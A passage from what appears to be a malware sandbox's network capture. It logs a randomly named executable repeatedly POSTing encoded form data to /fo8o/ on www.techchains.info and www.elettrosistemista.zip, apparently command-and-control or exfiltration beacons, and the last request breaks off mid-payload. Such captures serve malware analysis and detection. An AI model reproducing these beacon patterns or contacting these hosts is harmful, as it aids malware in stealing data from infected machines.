                                                                                  Nov 25, 2024 18:13:59.633409977 CET1236INData Raw: 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72
                                                                                  Data Ascii: ssage__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{
                                                                                  Nov 25, 2024 18:13:59.633469105 CET1236INData Raw: 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6d 61 72 67
                                                                                  Data Ascii: s:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;borde
                                                                                  Nov 25, 2024 18:13:59.633481979 CET1236INData Raw: 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73
                                                                                  Data Ascii: transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked
                                                                                  Nov 25, 2024 18:13:59.753947020 CET1236INData Raw: 72 75 65 2c 22 6e 6f 46 6f 6c 6c 6f 77 22 3a 66 61 6c 73 65 2c 22 73 6c 73 68 22 3a 66 61 6c 73 65 2c 22 70 70 73 68 22 3a 74 72 75 65 2c 22 64 6e 68 6c 73 68 22 3a 74 72 75 65 2c 22 74 6f 53 65 6c 6c 55 72 6c 22 3a 22 22 2c 22 74 6f 53 65 6c 6c
                                                                                  Data Ascii: rue,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"","toSellText":"","searchboxPath":"//www.rssnewscast.com/parking.php","searchParams":{"ses":"Y3JlPTE3MzI1NTQ4MzkmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjc0NGIwNTc2NGY4ODYuNDMxM


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.44999266.29.149.46805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:14:14.157547951 CET782OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
                                                                                  Nov 25, 2024 18:14:15.476638079 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:15 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.44999866.29.149.46805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:14:16.812448025 CET802OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d
                                                                                  Data Ascii: 7BpTBrLp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
                                                                                  Nov 25, 2024 18:14:18.107289076 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:17 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.45000566.29.149.46805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:14:19.462949038 CET10884OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 [TRUNCATED]
                                                                                  Data Ascii: 7BpTBrLp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8FxwN1gFMyxBM/tNPbBkWWg65rW9OhS47R+Iv/tlYxFS0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vMbwnt4DQqh8cNgsgk228k2L5PngYyoOdflnFrW7M3LcFPsxhRf+//D4dcTwaOVLhv3eCUZqpusHwyXPwgW6TuK70JeCi9ELbm/JHs5nEZNYt9gINRz/xk4saE+gyfNPVd3USkEHFWiwgLoCdyxMiCnCV8N7vp9jvHuYVFECizejIFUsj1L5awlRSArxkosu88jFosLjjCV7rQpRN0ORDusbVE2SNfVKz2OyNaNQdvD2CWu0KTn2b3qsWvBXgwId92/TbSN8occRSpiyYr1jezk5xorkS1szuFZ/RymGtg/8QkAbBDTGyV4RefsT9vhapIKaqQEEOoeKY/5ZP269UFz+h5ide/dT34BdS9mqqT2UIUly3+AMrUEY30rOFIix6vdECEKy5LB2rpiNOOSVaiXWCgixsCCORrIiVOr3P5e3OV9DPwPyAsbm89NL/G5GEi+zK+YkrbbMcdFfMu1NNykUJeOn8j6mvaCZ8viIlMthIq3jRhpa4WGktmqI9JGAiWfe3RTFf5UoLc/LRdG7NWrwQEHYRtULAb2RmPTJSIhRo3JF+TqzjwKDv6E6/m4JXZju0iG5ZlM4iBaYQ6BAN6HSGPTPiBOfNYSnFlpqkN5mTxHH3dRegdjc9HfvbUxICgg/Zv6i5Vjk5NQIjfwdN4cUtFDB6sbzMnctvq74A7LnkLpf6PVYILwp0uRFKRNJXdXxCqQHmxVOcJAofjqgMSHN/cmP/q8HxjOm4JN1IK4EIjTWH [TRUNCATED]
                                                                                  Nov 25, 2024 18:14:20.787000895 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:20 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.45001366.29.149.46805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:14:22.140304089 CET507OUTGET /fo8o/?7BpTBrLp=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.techchains.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Nov 25, 2024 18:14:23.456640005 CET652INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:23 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.450019195.110.124.133805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:14:34.420121908 CET800OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
                                                                                  Nov 25, 2024 18:14:35.873465061 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:35 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.450020195.110.124.133805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:14:37.070976019 CET820OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 34 39 4b 6b 79 52 6f 47 37 38 34 48 31 4a 4c 6b 48 36 72 2f 74 6c 72 79 79 4c 4b 47 4c 79 70 55 3d
